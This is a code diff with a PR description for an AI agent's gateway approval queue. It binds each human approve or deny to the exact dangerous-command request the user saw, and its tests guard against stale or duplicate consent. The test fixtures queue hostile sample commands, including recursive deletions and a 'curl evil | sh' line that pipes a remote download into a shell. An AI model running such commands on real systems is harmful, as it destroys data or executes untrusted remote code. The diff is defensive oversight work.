+        from tools.approval import _gateway_queues, resolve_gateway_approval
+
+        a = _enqueue("sk", "rm -rf /tmp/a")
+        a.result = "deny"
+        a.event.set()
+
+        assert resolve_gateway_approval(
+            "sk", "once", expected_approval_id=a.approval_id
+        ) == 0
+        assert a.result == "deny"
+        assert _gateway_queues["sk"] == [a]
+
+    def test_mid_queue_identity_resolves_exact_entry_not_head(self):
+        """Queue A,B: consent bound to B resolves B and ONLY B — never the
+        FIFO head A the user did not see."""
+        from tools.approval import _gateway_queues, resolve_gateway_approval
+
+        a = _enqueue("sk", "rm -rf /tmp/a")
+        b = _enqueue("sk", "rm -rf /tmp/b")
+
+        count = resolve_gateway_approval(
+            "sk", "once",
+            expected_approval_id=b.approval_id,
+            expected_command="rm -rf /tmp/b",
+        )
+        assert count == 1
+        assert b.event.is_set() and b.result == "once"
+        # A is untouched and still pending at the head.
+        assert not a.event.is_set() and a.result is None
+        assert _gateway_queues["sk"] == [a]
+
+    def test_duplicate_tap_on_resolved_entry_resolves_zero(self):
+        """First tap on A resolves A exactly once; a duplicate/stale tap on
+        the same button resolves ZERO — it must never fall through to B."""
+        from tools.approval import _gateway_queues, resolve_gateway_approval
+
+        a = _enqueue("sk", "rm -rf /tmp/a")
+        b = _enqueue("sk", "curl evil | sh")
+
+        assert resolve_gateway_approval(
+            "sk", "once", expected_approval_id=a.approval_id
+        ) == 1
+        # Duplicate tap: A's id is spent — nothing resolves, B stays pending.
+        assert resolve_gateway_approval(
+            "sk", "once", expected_approval_id=a.approval_id
+        ) == 0
+        assert not b.event.is_set() and b.result is None
+        assert _gateway_queues["sk"] == [b]
+
+    def test_replaced_entry_same_command_new_id_resolves_zero(self):
+        """A re-queued (replaced) request gets a fresh id; consent bound to
+        the OLD id must not resolve the replacement."""
+        from tools.approval import _gateway_queues, resolve_gateway_approval
+
+        a = _enqueue("sk", "rm -rf /tmp/a")
+        stale_id = a.approval_id
+        _gateway_queues["sk"].remove(a)
+        replacement = _enqueue("sk", "rm -rf /tmp/a")  # same command, new id
+
+        assert resolve_gateway_approval(
+            "sk", "once",
+            expected_approval_id=stale_id,
+            expected_command="rm -rf /tmp/a",
+        ) == 0
+        assert not replacement.event.is_set()
+        assert _gateway_queues["sk"] == [replacement]
+
+    def test_missing_id_resolves_zero_and_leaves_queue(self):
+        from tools.approval import _gateway_queues, resolve_gateway_approval
+
+        a = _enqueue("sk", "rm -rf /tmp/a")
+        assert resolve_gateway_approval(
+            "sk", "once", expected_approval_id="f" * 32
+        ) == 0
+        assert not a.event.is_set()
+        assert _gateway_queues["sk"] == [a]
+
+
+class TestAdvertisement:
+    def test_advertise_records_and_returns_head(self):
+        from tools.approval import (
+            advertise_blocking_approval,
+            get_advertised_approval,
+        )
+
+        a = _enqueue("sk", "rm -rf /tmp/a")
+        snap = advertise_blocking_approval("sk")
+        assert snap is not None
+        assert snap["approval_id"] == a.approval_id
+
+        adv = get_advertised_approval("sk")
+        assert adv is not None
+        assert adv["approval_id"] == a.approval_id
+        assert adv["command"] == "rm -rf /tmp/a"
+
+    def test_advertise_empty_queue_clears_and_returns_none(self):
+        from tools.approval import (
+            advertise_blocking_approval,
+            get_advertised_approval,
+        )
+
+        _enqueue("sk", "rm -rf /tmp/a")
+        advertise_blocking_approval("sk")
+        # The entry times out and the waiter drops it; the advertisement
+        # briefly outlives it.
+        from tools.approval import _gateway_queues
+        _gateway_queues.pop("sk")
+        # Nothing pending now — advertising must clear the stale record.
+        assert advertise_blocking_approval("sk") is None
+        assert get_advertised_approval("sk") is None
+
+    def test_resolving_advertised_entry_clears_advertisement(self):
+        from tools.approval import (
+            advertise_blocking_approval,
+            get_advertised_approval,
+            resolve_gateway_approval,
+        )
+
+        a = _enqueue("sk", "rm -rf /tmp/a")
+        advertise_blocking_approval("sk")
+        assert resolve_gateway_approval(
+            "sk", "once", expected_approval_id=a.approval_id
+        ) == 1
+        assert get_advertised_approval("sk") is None
+
+    def test_direct_resolution_of_advertised_head_consumes_advertisement(self):
+        """A native button tap resolves without an expectation; when it
+        lands on the advertised head, the advertisement goes with it."""
+        from tools.approval import (
+            advertise_blocking_approval,
+            get_advertised_approval,
+            resolve_gateway_approval,
+        )
+
+        a = _enqueue("sk", "rm -rf /tmp/a")
+        _enqueue("sk", "rm -rf /tmp/b")
+        advertise_blocking_approval("sk")
+        # Head (a) resolves without expectation (e.g. native button path).
+        assert resolve_gateway_approval("sk", "once") == 1
+        assert a.event.is_set()
+        # a was the advertised one → advertisement cleared.
+        assert get_advertised_approval("sk") is None
+
+    def test_clear_advertised_approval(self):
+        from tools.approval import (
+            advertise_blocking_approval,
+            clear_advertised_approval,
+            get_advertised_approval,
+        )
+
+        _enqueue("sk", "rm -rf /tmp/a")
+        advertise_blocking_approval("sk")
+        clear_advertised_approval("sk")
+        assert get_advertised_approval("sk") is None
+
+    def test_clear_session_drops_advertisement(self):
+        from tools.approval import (
+            advertise_blocking_approval,
+            clear_session,
+            get_advertised_approval,
+        )
+
+        _enqueue("sk", "rm -rf /tmp/a")
+        advertise_blocking_approval("sk")
+        clear_session("sk")
+        assert get_advertised_approval("sk") is None
+
+    def test_unregister_gateway_notify_drops_advertisement(self):
+        from tools.approval import (
+            advertise_blocking_approval,
+            get_advertised_approval,
+            register_gateway_notify,
+            unregister_gateway_notify,
+        )
+
+        _enqueue("sk", "rm -rf /tmp/a")
+        register_gateway_notify("sk", lambda data: None)
+        advertise_blocking_approval("sk")
+        unregister_gateway_notify("sk")
+        assert get_advertised_approval("sk") is None
+
+    def test_advertise_by_id_records_mid_queue_entry_not_head(self):
+        """Delivery confirmation for prompt B (behind A in the queue) must
+        advertise B — the request the user actually saw."""
+        from tools.approval import (
+            advertise_blocking_approval,
+            get_advertised_approval,
+        )
+
+        _enqueue("sk", "rm -rf /tmp/a")
+        b = _enqueue("sk", "rm -rf /tmp/b")
+
+        snap = advertise_blocking_approval("sk", approval_id=b.approval_id)
+        assert snap is not None
+        assert snap["approval_id"] == b.approval_id
+        assert snap["command"] == "rm -rf /tmp/b"
+
+        adv = get_advertised_approval("sk")
+        assert adv == {"approval_id": b.approval_id, "command": "rm -rf /tmp/b"}
+
+    def test_advertise_by_id_missing_entry_records_nothing(self):
+        """Confirming delivery of a prompt whose entry is already gone must
+        clear an older binding rather than authorize the wrong visible prompt."""
+        from tools.approval import (
+            advertise_blocking_approval,
+            get_advertised_approval,
+        )
+
+        a = _enqueue("sk", "rm -rf /tmp/a")
+        b = _enqueue("sk", "rm -rf /tmp/b")
+        from tools.approval import _gateway_queues
+        _gateway_queues["sk"].remove(b)
+
+        # No prior binding: dead id records nothing.
+        assert advertise_blocking_approval("sk", approval_id=b.approval_id) is None
+        assert get_advertised_approval("sk") is None
+
+        # The newest visible prompt was B. If B disappeared while delivery
+        # completed, plain typed approval must re-present instead of falling
+        # back to the older A prompt.
+        advertise_blocking_approval("sk", approval_id=a.approval_id)
+        assert advertise_blocking_approval("sk", approval_id=b.approval_id) is None
+        assert get_advertised_approval("sk") is None
+
+    def test_advertise_by_id_command_mismatch_records_nothing(self):
+        from tools.approval import (
+            advertise_blocking_approval,
+            get_advertised_approval,
+        )
+
+        a = _enqueue("sk", "rm -rf /tmp/a")
+        advertise_blocking_approval("sk")
+        assert get_advertised_approval("sk") is not None
+        assert advertise_blocking_approval(
+            "sk", approval_id=a.approval_id, command="different"
+        ) is None
+        assert get_advertised_approval("sk") is None
+
+
+class TestCallbackValueCodec:
+    """encode/decode helpers used by string-payload button surfaces."""
+
+    def test_round_trip(self):
+        from tools.approval import (
+            decode_approval_callback_value,
+            encode_approval_callback_value,
+        )
+
+        approval_id = "0123456789abcdef" * 2
+        packed = encode_approval_callback_value("agent:main:slack:C1", approval_id)
+        assert packed == f"agent:main:slack:C1|{approval_id}"
+        assert decode_approval_callback_value(packed) == (
+            "agent:main:slack:C1", approval_id,
+        )
+
+    def test_empty_or_malformed_id_degrades_to_bare_session_key(self):
+        from tools.approval import (
+            decode_approval_callback_value,
+            encode_approval_callback_value,
+        )
+
+        assert encode_approval_callback_value("sk", "") == "sk"
+        assert encode_approval_callback_value("sk", "not-hex") == "sk"
+        assert decode_approval_callback_value("sk") == ("sk", None)
+        # A legacy session key containing '|' but no trailing 32-hex id
+        # still decodes whole (unbound FIFO), never as a bogus identity.
+        assert decode_approval_callback_value("sk|tail") == ("sk|tail", None)

--- a/tools/approval.py
+++ b/tools/approval.py
@@ -22,6 +22,7 @@ import tempfile
 import threading
 import time
 import unicodedata
+import uuid
 from typing import Optional
 from hermes_cli.config import cfg_get
 
@@ -2440,22 +2441,55 @@ def _denial_breaker_addendum(session_key: str) -> str:
 # resolves every pending approval in the session.
 
 
+class _FrozenApprovalData(dict):
+    """Read-only dict payload shared with asynchronous prompt adapters."""
+
+    @staticmethod
+    def _blocked(*args, **kwargs):
+        raise TypeError("approval request data is immutable")
+
+    __setitem__ = _blocked
+    __delitem__ = _blocked
+    clear = _blocked
+    pop = _blocked
+    popitem = _blocked
+    setdefault = _blocked
+    update = _blocked
+    __ior__ = _blocked
+
+
 class _ApprovalEntry:
     """One pending dangerous-command approval inside a gateway session."""
-    __slots__ = ("event", "data", "result", "reason")
+    __slots__ = (
+        "event", "data", "command", "result", "reason",
+        "approval_id", "created_ts",
+    )
 
     def __init__(self, data: dict):
         self.event = threading.Event()
-        self.data = data          # command, description, pattern_keys, …
+        self.approval_id: str = uuid.uuid4().hex
+        # Own the request payload and freeze the executable action separately.
+        # Callers and async prompt senders must not be able to mutate what a
+        # later approval authorizes after the user has seen the prompt.
+        owned = dict(data)
+        owned["approval_id"] = self.approval_id
+        self.data = _FrozenApprovalData(owned)
+        self.command = str(self.data.get("command", ""))
         self.result: Optional[str] = None  # "once"|"session"|"always"|"deny"
         # Optional free-text reason supplied with an explicit deny
         # (``/deny <reason>``) so the agent can adapt instead of only
         # hearing "denied". Ported from qwibitai/nanoclaw#2832.
         self.reason: Optional[str] = None
+        self.created_ts: float = time.time()
 
 
 _gateway_queues: dict[str, list] = {}        # session_key → [_ApprovalEntry, …]
 _gateway_notify_cbs: dict[str, object] = {}  # session_key → callable(approval_data)
+# session_key → snapshot of the request the gateway most recently
+# RE-PRESENTED to the user (expired-UI / busy-text recovery). A later
+# explicit approve/deny is bound to this identity: resolution revalidates the
+# exact live entry (which may be mid-queue) and refuses when it no longer matches.
+_advertised_approvals: dict[str, dict] = {}
 
 
 def register_gateway_notify(session_key: str, cb) -> None:
@@ -2478,6 +2512,7 @@ def unregister_gateway_notify(session_key: str) -> None:
     """
     with _lock:
         _gateway_notify_cbs.pop(session_key, None)
+        _advertised_approvals.pop(session_key, None)
         entries = _gateway_queues.pop(session_key, [])
     for entry in entries:
         entry.event.set()
@@ -2485,7 +2520,10 @@ def unregister_gateway_notify(session_key: str) -> None:
 
 def resolve_gateway_approval(session_key: str, choice: str,
                              resolve_all: bool = False,
-                             reason: Optional[str] = None) -> int:
+                             reason: Optional[str] = None,
+                             *,
+                             expected_approval_id: Optional[str] = None,
+                             expected_command: Optional[str] = None) -> int:
     """Called by the gateway's /approve or /deny handler to unblock
     waiting agent thread(s).
 
@@ -2497,25 +2535,78 @@ def resolve_gateway_approval(session_key: str, choice: str,
     deny (``/deny <reason>``).  It is relayed back to the agent in the
     BLOCKED message so it can adapt instead of only hearing "denied".
 
-    Returns the number of approvals resolved (0 means nothing was pending).
+    *expected_approval_id* / *expected_command* bind the resolution to a
+    specific request identity (see :func:`advertise_blocking_approval`).
+    When set, the exact live entry carrying that identity is located
+    ANYWHERE in the session queue under the lock immediately before
+    resolution — never substituted with the FIFO head — and it alone is
+    removed and resolved; every other entry stays pending.  If no live
+    entry carries the identity (it timed out, was resolved elsewhere, or
+    the consent is a duplicate/replayed/stale callback) NOTHING is
+    resolved and 0 is returned.  Timeout is never consent, and a spent
+    identity never resolves a neighbour.
+
+    Returns the number of approvals resolved (0 means nothing was pending
+    or the expected identity no longer matched).
     """
     with _lock:
         queue = _gateway_queues.get(session_key)
         if not queue:
             return 0
-        if resolve_all:
-            targets = list(queue)
-            queue.clear()
+
+        def _unresolved(entry) -> bool:
+            return entry.result is None and not entry.event.is_set()
+
+        if expected_approval_id is not None:
+            target = next(
+                (e for e in queue if e.approval_id == expected_approval_id),
+                None,
+            )
+            if target is None or not _unresolved(target):
+                return 0
+            if (
+                expected_command is not None
+                and target.command != str(expected_command)
+            ):
+                return 0
+            if resolve_all and len(queue) > 1:
+                # A single advertised request can never authorize the rest
+                # of the queue — later entries may have arrived after the
+                # user read the prompt they are consenting to.  Refuse bulk
+                # resolution outright; callers walk the queue one explicit
+                # consent at a time.
+                return 0
+            queue.remove(target)
+            targets = [target]
+        elif resolve_all:
+            targets = [entry for entry in queue if _unresolved(entry)]
+            if not targets:
+                return 0
+            for target in targets:
+                queue.remove(target)
         else:
+            target = queue[0]
+            if not _unresolved(target):
+                return 0
             targets = [queue.pop(0)]
         if not queue:
             _gateway_queues.pop(session_key, None)
-
-    for entry in targets:
-        entry.result = choice
-        if reason:
-            entry.reason = reason
-        entry.event.set()
+        # The advertised request (if any) is consumed by its own
+        # resolution so a stale binding can't gate a later, unrelated
+        # approve.
+        adv = _advertised_approvals.get(session_key)
+        if adv is not None and any(
+            t.approval_id == adv.get("approval_id") for t in targets
+        ):
+            _advertised_approvals.pop(session_key, None)
+        # Complete the winner while the same lock that selected and removed
+        # it is still held. Interrupt/timeout and a duplicate callback cannot
+        # slip into the remove→event window and overwrite the outcome.
+        for entry in targets:
+            entry.result = choice
+            if reason:
+                entry.reason = reason
+            entry.event.set()
     return len(targets)
 
 
@@ -2523,6 +2614,143 @@ def has_blocking_approval(session_key: str) -> bool:
     """Check if a session has one or more blocking gateway approvals waiting."""
     with _lock:
         return bool(_gateway_queues.get(session_key))
+
+
+def _entry_snapshot_locked(session_key: str, entry) -> dict:
+    """Snapshot one pending approval entry. Caller must hold ``_lock``."""
+    queue = _gateway_queues.get(session_key) or []
+    return {
+        "approval_id": entry.approval_id,
+        "command": entry.command,
+        "description": str(entry.data.get("description", "")),
+        "created_ts": entry.created_ts,
+        "pending_count": len(queue),
+    }
+
+
+def _head_snapshot_locked(session_key: str) -> Optional[dict]:
+    """Snapshot the oldest pending approval. Caller must hold ``_lock``."""
+    queue = _gateway_queues.get(session_key)
+    if not queue:
+        return None
+    return _entry_snapshot_locked(session_key, queue[0])
+
+
+def peek_blocking_approval(session_key: str) -> Optional[dict]:
+    """Return a snapshot of the oldest pending approval, or None.
+
+    This is the request a plain ``/approve`` would resolve.  The snapshot
+    is a copy — mutating it does not affect the queue.
+    """
+    with _lock:
+        return _head_snapshot_locked(session_key)
+
+
+def advertise_blocking_approval(
+    session_key: str,
+    *,
+    approval_id: Optional[str] = None,
+    command: Optional[str] = None,
+) -> Optional[dict]:
+    """Record a request as "the prompt the user was just shown".
+
+    Two callers, two shapes:
+
+    * ``approval_id`` given — the prompt-delivery path, right after a
+      SUCCESSFUL send: bind to the exact request the delivered prompt
+      carried.  Under concurrency the delivered prompt is not necessarily
+      the FIFO head (a parallel subagent's request may sit in front of
+      it), so the entry is located anywhere in the live queue by identity;
+      *command*, when given, must also match.  If no live entry carries
+      the identity — it resolved or timed out while the send was in
+      flight — nothing is recorded and any older advertisement is cleared.
+      The newly delivered prompt was the latest thing the user saw, so a
+      plain typed decision must re-present instead of falling back to an
+      older request.  None is returned.
+    * no ``approval_id`` — gateway recovery paths right before they
+      re-present the HEAD request whose original UI is gone (expired
+      buttons, missed prompt): record the head, or clear any stale record
+      and return None when nothing is pending.
+
+    A later explicit approve/deny is revalidated against the recorded
+    identity — it resolves exactly this request or nothing.
+
+    Returns the recorded snapshot, or None when nothing was recorded.
+    """
+    with _lock:
+        if approval_id is not None:
+            queue = _gateway_queues.get(session_key) or []
+            entry = next(
+                (e for e in queue if e.approval_id == approval_id), None,
+            )
+            if entry is None:
+                _advertised_approvals.pop(session_key, None)
+                return None
+            if (
+                command is not None
+                and entry.command != str(command)
+            ):
+                _advertised_approvals.pop(session_key, None)
+                return None
+            snap = _entry_snapshot_locked(session_key, entry)
+        else:
+            snap = _head_snapshot_locked(session_key)
+            if snap is None:
+                _advertised_approvals.pop(session_key, None)
+                return None
+        _advertised_approvals[session_key] = {
+            "approval_id": snap["approval_id"],
+            "command": snap["command"],
+        }
+        return snap
+
+
+def get_advertised_approval(session_key: str) -> Optional[dict]:
+    """Return the identity last advertised for this session, or None."""
+    with _lock:
+        adv = _advertised_approvals.get(session_key)
+        return dict(adv) if adv is not None else None
+
+
+# ``_ApprovalEntry.approval_id`` is always ``uuid.uuid4().hex``.
+_APPROVAL_ID_RE = re.compile(r"[0-9a-f]{32}")
+
+
+def encode_approval_callback_value(session_key: str, approval_id: str = "") -> str:
+    """Pack a session key + request identity into one button-payload string.
+
+    Platform button payloads (Slack Block Kit ``value``, Feishu card value,
+    …) predate request identity and carried only the session key.  Append
+    the approval_id behind a ``|`` so every callback can resolve exactly
+    the request its prompt showed.  An empty/malformed id degrades to the
+    bare session key (legacy FIFO resolution).
+    """
+    approval_id = str(approval_id or "")
+    if _APPROVAL_ID_RE.fullmatch(approval_id):
+        return f"{session_key}|{approval_id}"
+    return str(session_key or "")
+
+
+def decode_approval_callback_value(value: str) -> tuple[str, Optional[str]]:
+    """Split a button-payload string into ``(session_key, approval_id|None)``.
+
+    Inverse of :func:`encode_approval_callback_value`.  The id is only
+    recognized when the final ``|``-separated segment is a full 32-char
+    hex uuid, so legacy payloads (bare session key, even one containing
+    ``|``) fall back to ``(value, None)`` — the unbound FIFO path.
+    """
+    value = str(value or "")
+    if "|" in value:
+        head, tail = value.rsplit("|", 1)
+        if _APPROVAL_ID_RE.fullmatch(tail):
+            return head, tail
+    return value, None
+
+
+def clear_advertised_approval(session_key: str) -> None:
+    """Drop the advertised-request binding for a session."""
+    with _lock:
+        _advertised_approvals.pop(session_key, None)
 
 
 def submit_pending(session_key: str, approval: dict):
@@ -2583,6 +2811,7 @@ def clear_session(session_key: str) -> None:
         _session_approved.pop(session_key, None)
         _session_yolo.discard(session_key)
         _pending.pop(session_key, None)
+        _advertised_approvals.pop(session_key, None)
         entries = _gateway_queues.pop(session_key, [])
     for entry in entries:
         # Session-boundary cleanup should cancel any blocked approval waits
@@ -3616,12 +3845,14 @@ def _await_gateway_decision(session_key: str, notify_cb, approval_data: dict,
     notify callback raised.  Persistence of an approved choice and building
     the final tool-facing result dict remain the caller's responsibility.
     """
-    command = approval_data.get("command", "")
+    entry = _ApprovalEntry(approval_data)
+    # From this point onward the queue-owned copy and frozen command are the
+    # source of truth. The caller may retain and mutate its original dict.
+    approval_data = entry.data
+    command = entry.command
     description = approval_data.get("description", "")
     primary_key = approval_data.get("pattern_key", "")
     all_keys = approval_data.get("pattern_keys", [primary_key])
-
-    entry = _ApprovalEntry(approval_data)
     with _lock:
         _gateway_queues.setdefault(session_key, []).append(entry)
 
@@ -3685,6 +3916,12 @@ def _await_gateway_decision(session_key: str, notify_cb, approval_data: dict,
     # excludes it (#79719).
     with human_wait_window(session_key):
         while True:
+            # Observe a decision that already won before considering a later
+            # interrupt. Both writers use the approval lock, so the first
+            # outcome is final.
+            if entry.event.is_set():
+                resolved = True
+                break
             # Respect interrupt signals (e.g. /stop, /new, or an inactivity
             # timeout from the gateway) so a pending approval doesn't keep the
             # session wedged on threading.Event.wait() until the 5-minute approval
@@ -3698,8 +3935,10 @@ def _await_gateway_decision(session_key: str, notify_cb, approval_data: dict,
                     "returning deny for session %s",
                     session_key,
                 )
-                entry.result = "deny"
-                entry.event.set()
+                with _lock:
+                    if entry.result is None and not entry.event.is_set():
+                        entry.result = "deny"
+                        entry.event.set()
                 resolved = True
                 break
             _remaining = _deadline - time.monotonic()

--- a/tui_gateway/methods_prompt.py
+++ b/tui_gateway/methods_prompt.py
@@ -968,6 +968,12 @@ def _(rid, params: dict) -> dict:
     try:
         from tools.approval import resolve_gateway_approval
 
+        # The approval.request event carries the queued request's
+        # approval_id; a client that echoes it back binds this decision to
+        # exactly that request — a stale/duplicate/replaced id resolves 0
+        # instead of whatever is at the head of the queue.  Clients that
+        # omit it keep the legacy FIFO behavior.
+        expected_approval_id = str(params.get("approval_id") or "").strip() or None
         return _ok(
             rid,
             {
@@ -975,6 +981,7 @@ def _(rid, params: dict) -> dict:
                     session["session_key"],
                     params.get("choice", "deny"),
                     resolve_all=params.get("all", False),
+                    expected_approval_id=expected_approval_id,
                 )
             },
         )


### PR DESCRIPTION
## Summary

Closes #82554.

Dangerous gateway approvals currently survive longer than their presentation UI, but delayed typed consent and interactive callbacks are not bound to the exact request the user saw. A stale reply or duplicate button callback can therefore resolve a newer queue entry.

This PR makes approval consent request-bound and recoverable:

- every queued approval gets an immutable request ID and frozen command snapshot;
- successful prompt delivery advertises that exact ID + command; failed or indeterminate delivery advertises nothing;
- delayed `/approve` and `/deny` compare-and-consume the advertised request under the approval lock;
- an absent, expired, changed, or superseded binding executes nothing and re-presents the current request;
- ordinary text sent while a dangerous approval blocks the session re-surfaces the exact pending command and explicit response options;
- native button callbacks on Discord, Telegram, Slack, Teams, Matrix, Feishu, QQBot, WhatsApp, relay, API, and TUI paths propagate the request ID, so duplicate/stale callbacks cannot approve the next command;
- recovered bulk approval is refused unless the exact advertised set can be proven; the safe recovery path walks requests one at a time;
- approval/interrupt resolution is first-writer-wins and request presentation data is immutable after enqueue.

## Conflict-safe scope

This is deliberately **approval-only**. It does not duplicate the clarification-component work in #72742/#75732. It is complementary to the pending-approval feedback/routing work in #27352/#27541 and #81026/#81088: those discuss recognizing or explaining replies; this PR supplies the consent identity and execution-time revalidation boundary.

## Verification

After rebasing onto current upstream `main` (`326bdfb7a`):

- 111 focused gateway/platform/API/TUI approval tests passed;
- ruff passed on all touched production files;
- py_compile and `git diff --check` passed;
- an independent adversarial release gate exercised caller/presentation mutation, stale duplicate callbacks, superseded requests, interrupt-vs-approval races, and `None`/failed delivery receipts.

The existing unrelated root-home `authorized_keys` detector assertion in `tests/tools/test_approval.py` remains a current-upstream baseline issue; this PR does not touch command detection.
